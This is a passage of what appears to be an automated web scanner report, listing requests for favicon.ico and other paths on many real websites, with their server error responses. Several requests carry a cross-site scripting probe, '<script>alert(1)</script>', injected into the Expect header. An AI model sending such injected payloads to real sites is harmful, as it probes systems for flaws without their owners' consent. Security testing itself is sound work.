Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

29.36. http://www.corning.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.corning.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.corning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:19:54 GMT
Connection: close
Content-Type: text/html
Content-Length: 108

<html><head><title>Object Not Found</title></head><body><h1>HTTP/1.1 404 Object Not Found</h1></body></html>

29.37. http://www.costore.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.costore.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.costore.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.38. http://www.crowleymarine.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crowleymarine.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crowleymarine.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:35:22 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.39. http://www.crystal-co.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.crystal-co.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.crystal-co.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.40. http://www.d2jsp.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.d2jsp.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.d2jsp.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Tue, 03 May 2011 10:17:08 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.41. http://www.dailynylongalleries.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dailynylongalleries.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dailynylongalleries.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:41:31 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Content-Type: text/html
Content-Length: 14051

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY style="background-color:#000;"><table style="width:100%; background-color:#000000; font-size:
...[SNIP]...

29.42. http://www.deguate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deguate.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deguate.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.43. http://www.deltasigmatheta.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deltasigmatheta.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.deltasigmatheta.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:10 GMT
Server: Microsoft-IIS/5.0
Accept-Ranges: bytes
Content-Length: 149
Content-Type: text/html

<html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1>The requested URL /favicon.ico was not found on this server.</body></html>

29.44. http://www.donrearic.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.donrearic.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.donrearic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:48:26 GMT
Content-Type: text/html
Connection: keep-alive
Server: Apache/Nginx/Varnish
Last-Modified: Mon, 17 May 2010 19:11:59 GMT
ETag: "d2e29bc8-4e4-486ceffc79be2"
Vary: Accept-Encoding
Content-Length: 1252
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

   <head>
    <title>404 Error - Page Not Found</title>
   </head>

   <body>
       <table style="border: 1px dashed rgb(204, 204, 204)
...[SNIP]...

29.45. http://www.duplinschools.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.duplinschools.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.duplinschools.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.46. http://www.eeteen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eeteen.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eeteen.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 12:33:53 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.47. http://www.eighteenmovs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eighteenmovs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eighteenmovs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Tue, 03 May 2011 10:56:22 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.48. http://www.englishpage.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.englishpage.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.englishpage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:42:42 GMT
Server: Apache
Last-Modified: Tue, 19 Jul 2005 21:39:31 GMT
ETag: "2e82d5-578-42dd7313"
Accept-Ranges: bytes
Content-Length: 1400
Content-Type: text/html

<html>

<head>

<title>404 File Not Found</title>

<STYLE>

<!--

BODY {

   font-family: Arial, Verdana, Sans-Serif;

   font-size: 11pt;

}

A:link {

   color: #000000;

   text-decoration: underline;

...[SNIP]...

29.49. http://www.examiner-enterprise.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.examiner-enterprise.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.examiner-enterprise.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: WWW
Content-Type: text/html
Date: Tue, 03 May 2011 11:08:20 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: examiner-enterprise.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

29.50. http://www.exoticnudism.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.exoticnudism.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.exoticnudism.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:16:27 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=30
Vary: Accept-Encoding
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.51. http://www.extremegrannytube.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.extremegrannytube.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extremegrannytube.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:23:11 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 492

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.
<HR>
<I>www.e
...[SNIP]...

29.52. http://www.eyny.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.eyny.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eyny.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Content-Length: 345
Date: Tue, 03 May 2011 10:16:54 GMT
Server: Apache/2.0.59

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.53. http://www.fantastictrans.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fantastictrans.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fantastictrans.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Tue, 03 May 2011 12:34:33 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

29.54. http://www.farmland.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.farmland.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.farmland.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 1238
Content-Type: text/html
Content-Location: http://www.farmland.org/404/index.htm?404;http://www.farmland.org:80/favicon.ico
Last-Modified: Tue, 31 Mar 2009 14:59:25 GMT
Accept-Ranges: bytes
ETag: "da64924811b2c91:5ce"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:05 GMT

<HTML>
<HEAD>
<TITLE>American Farmland Trust: 404 - file not found</TITLE>
<link href="/includes/css/content.css" rel="stylesheet" type="text/css">
<link href="/includes/css/layout.css" rel="style
...[SNIP]...

29.55. http://www.fat-angels.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fat-angels.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fat-angels.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.61
Date: Tue, 03 May 2011 10:44:37 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.61</center>
</body>
</html>

29.56. http://www.feed2js.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.feed2js.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.feed2js.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Tue, 03 May 2011 10:23:53 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.57. http://www.fightpp.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fightpp.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fightpp.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:27:02 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

29.58. http://www.flektor.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flektor.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flektor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

29.59. http://www.foxsportskansascity.com/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.foxsportskansascity.com
Path:	/common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1

Request

GET /common/appjs/~1300953231/s=main~thePlatform%5Eswfobject~thePlatform%5Eutil~thePlatform%5Eqos~thePlatform%5Eqos_mps~ugc/menz=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.foxsportskansascity.com

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 03 May 2011 17:06:30 GMT
Date: Tue, 03 May 2011 17:06:30 GMT
Connection: close
Content-Length: 106136

/* stored at 1300953231 */
function bigShowHide(inputString,direction){
   var pairs = inputString.split(",");
   var directions = direction.split(",");
   for (var i=0; i<pairs.length; i++){
       if(direction
...[SNIP]...

29.60. http://www.fozthumbs.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fozthumbs.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fozthumbs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Tue, 03 May 2011 10:18:01 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.62</center>
</body>
</html>

29.61. http://www.free-shit-sites.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.free-shit-sites.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.free-shit-sites.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Tue, 03 May 2011 10:35:22 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.62. http://www.freeboatshopper.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freeboatshopper.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeboatshopper.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:00:22 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 490

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.
<HR>
<I>www.f
...[SNIP]...

29.63. http://www.french-girls.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.french-girls.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.french-girls.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.63
Date: Tue, 03 May 2011 10:18:30 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.63</center>
</body>
</html>

29.64. http://www.futuretoolbars.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.futuretoolbars.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.futuretoolbars.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.39
Date: Tue, 03 May 2011 10:05:00 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.39</center>
</body>
</html>

29.65. http://www.gamewack.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamewack.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamewack.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Tue, 03 May 2011 16:00:11 GMT
Server: lighttpd

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

29.66. http://www.gasparinutrition.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gasparinutrition.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gasparinutrition.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:33:23 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.67. http://www.gecu-ep.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gecu-ep.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gecu-ep.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.68. http://www.getastrology.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.getastrology.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.getastrology.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.69. http://www.goldmaturetube.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.goldmaturetube.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.goldmaturetube.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 11:14:14 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
Keep-Alive: timeout=20

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.70. http://www.greatnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatnow.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatnow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

29.71. http://www.greatteengirl.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatteengirl.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greatteengirl.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 11:04:41 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

29.72. http://www.greenway.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greenway.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greenway.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:00:46 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.73. http://www.hairymature.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hairymature.org
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairymature.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Tue, 03 May 2011 10:34:09 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.0</center>
</body>
</html>

29.74. http://www.hairystars.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hairystars.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairystars.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Tue, 03 May 2011 11:29:07 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.75. http://www.hairytravel.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hairytravel.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairytravel.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.46
Date: Tue, 03 May 2011 10:25:02 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.76. http://www.helloindianapolis.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helloindianapolis.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helloindianapolis.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:52:32 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

29.77. http://www.helminc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.helminc.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helminc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
